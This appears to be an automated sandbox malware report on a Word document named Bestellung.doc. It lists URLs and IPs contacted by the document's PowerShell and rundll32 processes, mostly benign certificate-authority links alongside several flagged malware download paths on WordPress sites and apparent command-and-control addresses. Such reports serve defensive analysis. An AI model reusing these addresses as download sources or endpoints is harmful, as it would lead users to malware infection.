                      https://traumfrauen-ukraine.de0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://crl.netsolssl.com/NetworkSolutionsCertificateAuthori0%Avira URL Cloudsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                      http://traumfrauen-ukraine.de/bin/JyeS/0%Avira URL Cloudsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://repository.infonotary.com/cps/qcps.html0$0%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                      http://traumfrauen-ukraine.de0%Avira URL Cloudsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://ocsp.infonotary.com/responder.cgi0V0%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.sk.ee/cps/00%URL Reputationsafe
                      http://www.certicamara.com00%Avira URL Cloudsafe
                      http://www.globaltrust.info0=0%Avira URL Cloudsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      http://www.ssc.lt/cps030%URL Reputationsafe
                      https://shop.nowfal.dev/wp-includes/RlMObf2j0/100%Avira URL Cloudmalware
                      http://ocsp.sectigo.com0/0%Avira URL Cloudsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://ocsp.pki.gva.es00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                      http://203.157.152.9:7080/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/0%Avira URL Cloudsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.dnie.es/dpc00%URL Reputationsafe
                      http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                      http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                      http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      shop.nowfal.dev
                      		104.21.88.166
                      		truetrueunknown
                      traumfrauen-ukraine.de
                      		212.227.200.73
                      		truetrueunknown
                      e-wdesign.eu
                      		45.138.97.75
                      		truetrueunknown
                      nightlifemumbai.club
                      		172.217.6.174
                      		truetrueunknown
                      jflmktg.wpcomstaging.com
                      		192.0.78.20
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://nightlifemumbai.club/x/0wBD3/true
                        • Avira URL Cloud: malware
                        		unknown
                        http://traumfrauen-ukraine.de/bin/JyeS/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://203.157.152.9:7080/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://e-wdesign.eu/wp-content/bn1IgDejh/true
                        • Avira URL Cloud: safe
                        		unknown
                        https://157.245.145.87:443/gjk3j942rq/3t3141347sxz/js59r1n8zph/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.a-cert.at0Epowershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.certplus.com/CRL/class3.crl0powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.chambersign.org/chambersroot.crl0powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.certifikat.dk/repository0powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://nightlifemumbai.clubpowershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.chambersign.org1powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.pkioverheid.nl/policies/root-policy0powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://repository.swisssign.com/0powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                          		high
                          https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/Ppowershell.exe, 00000005.00000002.2096708382.0000000002C54000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlpowershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ca.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://crl.netsolssl.com/NetworkSolutionsCertificateAuthoripowershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.certplus.com/CRL/class3P.crl0powershell.exe, 00000005.00000003.2094894681.000000001CCAE000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://repository.infonotary.com/cps/qcps.html0$powershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.post.trust.ie/reposit/cps.html0powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://traumfrauen-ukraine.depowershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.disig.sk/ca/crl/ca_disig.crl0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ocsp.infonotary.com/responder.cgi0Vpowershell.exe, 00000005.00000002.2103631224.000000001CC83000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.sk.ee/cps/0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.certicamara.com0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.globaltrust.info0=powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Epowershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://servername/isapibackend.dllpowershell.exe, 00000005.00000002.2104214034.000000001D220000.00000002.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.ssc.lt/cps03powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://shop.nowfal.dev/wp-includes/RlMObf2j0/powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://ocsp.sectigo.com0/powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.windows.com/pctv.rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpfalse
                            		high
                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.pki.gva.es0powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000005.00000003.2095094346.000000001CC8D000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.certicamara.com/dpc/0Zpowershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmpfalse
                              		high
                              http://www.dnie.es/dpc0powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000005.00000003.2095090679.000000001CC70000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.trustcenter.de/guidelines0powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000005.00000003.2095118567.000000001CC8A000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.globaltrust.info0powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmpfalse
                                		high
                                http://www.certplus.com/CRL/class3TS.crl0powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000005.00000003.2095108394.000000001CC61000.00000004.00000001.sdmpfalse
                                  		high
                                  https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2096093132.0000000002450000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100938430.0000000002970000.00000002.00000001.sdmpfalse
                                      		high
                                      https://www.catcert.net/verarrelpowershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.disig.sk/ca0fpowershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpfalse
                                        		high
                                        https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.signatur.rtr.at/current.crl0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.sk.ee/juur/crl/0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.quovadis.bm0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.firmaprofesional.com0powershell.exe, 00000005.00000002.2095470892.0000000000164000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.netlock.net/docspowershell.exe, 00000005.00000002.2095523344.00000000001FF000.00000004.00000020.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000005.00000003.2094871839.000000001CC82000.00000004.00000001.sdmpfalse
                                              		high
                                              http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpfalse
                                                  		high
                                                  https://jflmktg.wpcomstaging.com/wp-content/AK/powershell.exe, 00000005.00000002.2100518545.00000000039D4000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://jflmktg.wpcomstapowershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ocsp.entrust.net03powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000005.00000003.2095103092.000000001CC68000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://shop.nowfal.devpowershell.exe, 00000005.00000002.2100590447.0000000003AB6000.00000004.00000001.sdmptrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000005.00000003.2095132892.000000001CCE3000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.securetrust.com/STCA.crl0powershell.exe, 00000005.00000002.2103658864.000000001CC98000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000005.00000002.2095505629.00000000001CB000.00000004.00000020.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2104020286.000000001D027000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100503288.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099372618.00000000021F7000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://investor.msn.com/powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.valicert.com/1powershell.exe, 00000005.00000002.2103224125.000000001B3D4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.%s.comPApowershell.exe, 00000005.00000002.2096093132.0000000002450000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100938430.0000000002970000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		low
                                                      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ocsp.quovadisoffshore.com0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ocsp.entrust.net0Dpowershell.exe, 00000005.00000003.2095298060.000000001B49C000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://traumfrauen-ukraine.de/bin/JyeS/powershell.exe, 00000005.00000002.2100614327.0000000003B0D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000005.00000003.2095061790.000000001CCA4000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ca.sia.it/secsrv/repository/CRL.der0Jpowershell.exe, 00000005.00000003.2095042856.000000001CC5A000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://investor.msn.compowershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmpfalse
                                                        		high
                                                        https://sectigo.com/CPS0powershell.exe, 00000005.00000003.2095272033.000000001B469000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://crl.entrust.net/server1.crl0powershell.exe, 00000005.00000003.2095288882.000000001B488000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.ancert.com/cps0powershell.exe, 00000005.00000003.2095067797.000000001CC91000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.21.88.166
                                                          		unknownUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          70.32.89.105
                                                          		unknownUnited States
                                                          		398110GO-DADDY-COM-LLCUStrue
                                                          203.157.152.9
                                                          		unknownThailand
                                                          		9649MOPH-TH-APInformationTechnologyOfficeSGtrue
                                                          45.138.97.75
                                                          		unknownGermany
                                                          		9009M247GBtrue
                                                          132.248.38.158
                                                          		unknownMexico
                                                          		278UniversidadNacionalAutonomadeMexicoMXtrue
                                                          172.217.6.174
                                                          		unknownUnited States
                                                          		15169GOOGLEUStrue
                                                          110.172.180.180
                                                          		unknownIndia
                                                          		18002WORLDPHONE-INASNumberforInterdomainRoutingINtrue
                                                          157.245.145.87
                                                          		unknownUnited States
                                                          		14061DIGITALOCEAN-ASNUStrue
                                                          192.0.78.20
                                                          		unknownUnited States
                                                          		2635AUTOMATTICUStrue
                                                          212.227.200.73
                                                          		unknownGermany
                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                          190.55.186.229
                                                          		unknownArgentina
                                                          		27747TelecentroSAARtrue
                                                          161.49.84.2
                                                          		unknownPhilippines
                                                          		17639CONVERGE-ASConvergeICTSolutionsIncPHtrue

                                                          General Information

                                                          Joe Sandbox Version:31.0.0 Emerald
                                                          Analysis ID:344273
                                                          Start date:26.01.2021
                                                          Start time:10:48:08
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 9m 45s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:Bestellung.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
